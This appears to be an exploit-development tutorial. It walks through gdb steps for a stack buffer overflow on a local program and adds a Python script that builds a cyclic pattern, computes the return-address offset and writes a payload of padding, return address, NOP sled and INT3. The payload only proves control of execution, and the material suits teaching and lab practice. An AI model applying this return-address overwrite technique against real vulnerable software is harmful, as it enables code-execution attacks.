Disassemble the main function to find the ret (32-bit) / retq (64-bit, "return quad") instruction and note its address
(gdb) disassemble main
Set a breakpoint on that ret instruction, i.e. the moment the main function returns
(gdb) break *0x0...
Define a hook-stop, a user command that gdb runs automatically every time the program stops
(gdb) define hook-stop
Setup the hook
# Display the instruction that will execute next: $eip (32-bit) / $rip (64-bit)
> x/1i $eip
> x/1i $rip
# Examine the top of the stack as hex: 8 words with x/8wx $esp (32-bit) or 8 giant words with x/8gx $rsp (64-bit)
> x/8wx $esp
> x/8gx $rsp
# Close the hook-stop definition
> end
Execute it
(gdb) r
The program should stop at our breakpoint; single-step into the ret to watch the normal return
(gdb) si
Run the program again with the alphabet pattern as its stdin
(gdb) r < alphabet
Single-step into what should now be a segmentation fault, since the saved return address was overwritten by our input
(gdb) si
Inspect what sits at the stack pointer $esp (32-bit) / $rsp (64-bit): the bytes there come from our pattern, and their position in it gives the offset to the saved return address
(gdb) x/s $esp
(gdb) x/s $rsp
Run it again (the breakpoint is still set)
(gdb) r
Step into our return
(gdb) si
Inspect the registers; note the stack pointer so we know where our input will sit when ret executes
(gdb) info registers
Update the exploit script so the payload places an INT3 (0xCC) at the address we return to, then run with it as stdin
(gdb) r < exploit
Continue; if everything worked the overwritten return address sends the instruction pointer into the stack, execution hits the int3, and gdb reports SIGTRAP instead of SIGSEGV
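The two input files the steps above feed to gdb (alphabet and exploit) have to come from somewhere. The script below is an added example, not part of the original gist: it generates a non-repeating pattern for the alphabet run, turns the value gdb shows in $eip (32-bit) or at $rsp (64-bit) after the crash into the offset of the saved return address, and builds the exploit payload as padding + return address + NOP sled + INT3. The function names, the 256-byte default length, and the return address in the usage example are assumptions; the return address must be the stack address your own hook-stop printed (the $esp/$rsp value at the ret breakpoint plus one word, which is where the bytes after the saved return address sit), with ASLR disabled as gdb does by default.

```python
import struct
import string
import sys

# Constructed pattern: "Aa0Aa1Aa2...". Every 4-byte (and 8-byte) window is
# unique within the first ~20 KB, so whatever lands in the saved return
# address identifies its own offset (same idea as pattern_create).
def make_alphabet(length=256):
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length].encode()
    return "".join(triples)[:length].encode()


def _fmt(word_size):
    # struct format for a little-endian pointer of the target's word size
    if word_size == 4:
        return "<I"
    if word_size == 8:
        return "<Q"
    raise ValueError("word_size must be 4 or 8")


def find_offset(pattern, crash_value, word_size):
    """crash_value is the number gdb printed: $eip on 32-bit, or the first
    giant word at $rsp on 64-bit (a non-canonical address never makes it
    into $rip, the fault happens on the ret itself)."""
    needle = struct.pack(_fmt(word_size), crash_value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("crash value %#x not found in pattern" % crash_value)
    return idx


def build_exploit(offset, ret_addr, word_size, sled=64):
    """padding up to the saved return address, the address to return to,
    then a NOP sled ending in INT3 (0xCC) so a successful jump gives SIGTRAP."""
    return (b"A" * offset
            + struct.pack(_fmt(word_size), ret_addr)
            + b"\x90" * sled
            + b"\xcc")


if __name__ == "__main__":
    # usage: python3 gen.py              -> writes ./alphabet
    #        python3 gen.py <crash_value> <ret_addr> <4|8> -> writes ./exploit
    pattern = make_alphabet()
    if len(sys.argv) == 1:
        open("alphabet", "wb").write(pattern)
        print("wrote alphabet (%d bytes)" % len(pattern))
    else:
        crash, ret, ws = int(sys.argv[1], 0), int(sys.argv[2], 0), int(sys.argv[3])
        off = find_offset(pattern, crash, ws)
        payload = build_exploit(off, ret, ws)
        open("exploit", "wb").write(payload)
        print("offset %d, wrote exploit (%d bytes)" % (off, len(payload)))
```

Feed the $eip/$rsp value straight from info registers or x/8gx $rsp (gdb prints hex, and int(..., 0) accepts it). If find_offset raises, the bytes gdb showed are not from the pattern: either the input did not reach the saved return address or the program mangled it on the way.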